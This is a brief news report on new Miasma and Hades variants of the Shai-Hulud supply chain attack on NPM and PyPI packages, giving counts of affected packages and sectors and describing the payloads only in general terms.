SECURITY researchers have reported new iterations of the Shai-Hulud supply chain attack, which have affected over 100 packages across the NPM and PyPI ecosystems since September 2025. The malware, demonstrated by the hacking group TeamPCP, has resulted in multiple campaigns targeting the open source software community, with growing attack waves. Two notable variants are the Miasma and Hades.
- **Miasma Variant**: This variant was involved in the Red Hat incident, affecting 32 infected packages and containing a payload that scans for credentials and spreads itself. By June 5, 57 NPM packages and over 300 malicious versions were identified.
- **Hades Variant**: A new branch was found in approximately 19 PyPI packages, utilizing a malicious setup file to fetch and execute additional JavaScript code. The second wave saw 29 additional packages targeted. Overall, 471 malicious artifacts have been identified across both ecosystems. The attacks have significantly impacted various sectors, including bioinformatics and machine learning.